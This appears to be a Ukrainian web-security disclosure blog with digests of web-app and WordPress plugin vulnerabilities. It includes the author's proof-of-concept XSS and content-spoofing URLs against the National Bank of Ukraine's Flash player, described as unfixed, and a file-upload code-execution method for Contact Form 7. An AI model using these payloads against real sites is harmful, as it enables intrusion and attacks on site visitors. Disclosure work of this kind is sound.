Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Sitecom WLM-3500 backdoor accounts (деталі)
• Moodle 2.5.0-1 (badges/external.php) PHP Object Injection Vulnerability (деталі)
• Multiple vulnerabilities in MediaWiki (деталі)
• ExpressionEngine 2.6 Persistent XSS (деталі)
• SQL Injection in vtiger CRM (деталі)

14.08.2013

У травні, 22.05.2013, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.bank.gov.ua - сайті Національного банку України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.bank.gov.ua. Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.blog.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.11.2013

XSS (через Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=http://site/1.swf

Content Spoofing (Content Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&pic=http://site/1.jpg

Content Spoofing (HTML Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site/1.jpg%27%3E

XSS:

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Дані уразливості досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cart66, Finalist та Dexs PM System. Для котрих з’явилися експлоіти. Cart66 - це е-комерс плагін для додання кошика покупця, Finalist - це плагін, Dexs PM System - це плагін.

• WordPress Cart66 1.5.1.14 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress Finalist Cross Site Scripting (деталі)
• WordPress Dexs PM System Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Multiple Vulnerabilities in D-Link devices (деталі)
• Multiple Vulnerabilities in Gnew (деталі)
• phpbb3 security update (деталі)
• Cross-Site Scripting (XSS) in WikkaWiki (деталі)
• OWASP ESAPI Security Advisory: MAC Bypass in ESAPI Symmetric Encryption (деталі)

В даній добірці експлоіти в веб додатках:

• FortiAnalyzer 5.0.4 - CSRF Vulnerability (деталі)
• Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability (деталі)
• ProcessMaker Open Source Authenticated PHP Code Execution (деталі)
• ISPConfig Authenticated Arbitrary PHP Code Execution Vulnerability (деталі)
• Zabbix Authenticated Remote Command Execution Vulnerability (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Woopra Analytics, Simple Flash Video та WordPress Pingback Port Scanner. Для котрих з’явилися експлоіти. Woopra Analytics - це плагін для ведення статистики, Simple Flash Video - це відео-плеєр, WordPress Pingback Port Scanner - це експлоіт для сканування портів через pingback функціонал в WP 3.5. У версії 3.5.1 цю уразливість виправили.

• WordPress Woopra Remote Code Execution (деталі)
• WordPress Simple Flash Video 1.7 Cross Site Scripting (деталі)
• Wordpress Pingback Port Scanner (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Окрім попередніх уразливостей, є ще багато дірок на stopthehacker.com. Це секюріті сервіс, що є конкурентом моїм Web VDS та SecurityAlert.

Торік, зокрема 15.12.2012, я знайшов численні уразливості на сайті http://stopthehacker.com. Серед них Brute Force та Insufficient Anti-automation уразливості. Ще у лютому 2012 я звертав увагу розробників цього сервісу на наявність багатьох інших дірок окрім тих, про які я повідомив їм, але вони проігнорували це. І не провели жодних аудитів безпеки і не виправили жодних нових уразливостей (а з попередніх дірок виправили лише одну дірку).

Brute Force:

https://panel.stopthehacker.com/login/

Insufficient Anti-automation:

https://panel.stopthehacker.com/login/signup

Ці та багато інших уразливостей досі не виправлені.

28.09.2013

У вересні, 17.09.2013, я виявив Code Execution уразливість в плагіні Contact Form 7 для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в численних плагінах для WordPress з VideoJS.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

21.11.2013

Code Execution (WASC-31):

Атака відбувається через аплоадер. Для виконання коду потрібно завантажити phtml (на веб серверах з PHP) чи asp/aspx (на IIS) файли.

В контактній формі потрібно, щоб був тег аплоадера, для якого потрібно вказати дозволені розширення (бо окрім списку заборонених розширень, плагін має ще й список дозволених, серед яких немає скриптів).

[file file-423 filetypes:phtml]

Файли завантажуються в папку:

http://site/wp-content/uploads/wpcf7_uploads/

При створенні цієї папки створюється файл .htaccess (Deny from all).

Це можна обійти або при використанні інших веб серверів окрім Apache (де .htaccess ігнорується), або на Апачі можна використати уразливості в WP для видалення файлів, або через LFI уразливість включити файл з цієї папки.

Уразливі Contact Form 7 3.5.2 та попередні версії. В версії 3.5.3 розробник вже виправив дану уразливість.

В даній добірці уразливості в веб додатках:

• Denial of Service vulnerabilities in Subversion (деталі)
• Django vulnerabilities (деталі)
• Multiple Vulnerabilities in X2CRM (деталі)
• joomla com_zimbcomment Components Local File Include vulnerability (деталі)
• Remote Code Execution in GLPI (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах SEO Watcher, Slimstat Ex та Quick Contact Form. Для котрих з’явилися експлоіти. SEO Watcher - це плагін для SEO, Slimstat Ex - це плагін для ведення статистики, Quick Contact Form - це контактна форма.

• WordPress SEO Watcher Remote Code Execution (деталі)
• WordPress Slimstat Ex Code Execution (деталі)
• WordPress Quick Contact Form 6.0 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.